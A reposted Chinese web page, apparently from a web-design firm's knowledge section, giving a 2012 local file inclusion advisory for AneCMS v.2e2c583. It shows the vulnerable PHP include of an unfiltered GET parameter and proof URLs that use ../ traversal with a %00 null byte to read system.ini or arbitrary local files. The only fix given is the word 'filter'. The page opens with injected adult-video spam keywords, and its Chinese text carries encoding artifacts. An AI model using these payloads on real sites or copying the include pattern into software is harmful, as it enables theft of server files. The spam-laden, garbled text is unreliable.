久艹视频免费看,亚洲成av人综合在线观看,51久久夜色精品国产水果派解说,gogo全球大胆高清人体444

知識(shí)學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時(shí)手機(jī):13896886023
  • ·QQ 咨 詢(xún):361652718 513960520
當(dāng)前位置 > 首頁(yè) > 知識(shí)學(xué)堂 > 網(wǎng)站建設(shè)知識(shí)
AneCMS v.2e2c583本地文件包含缺陷及修復(fù)
更新時(shí)間:2012-03-30 | 發(fā)布人:本站 | 點(diǎn)擊率:430
標(biāo)題: AneCMS v.2e2c583 LFI exploit
作者Author: I2sec-PJH
軟件開(kāi)發(fā)網(wǎng)站: https://github.com/AneGroup/AneCMS
影響版本: v.2e2c583
概述
source of index.php頁(yè)面存在缺陷
代碼分析如下
 
1. if(isset($_GET['p']))
2. include './pages/'.$_GET['p'].'.php';
3. else
4. include './pages/dash.php';
 
測(cè)試證明
http://www.badguest.cn /acp/index.php?p=../../../../windows/system.ini%00
http://www.badguest.cn /acp/index.php?p=../../../../[localfile]%00
 
提供修復(fù):
過(guò)濾
相關(guān)文章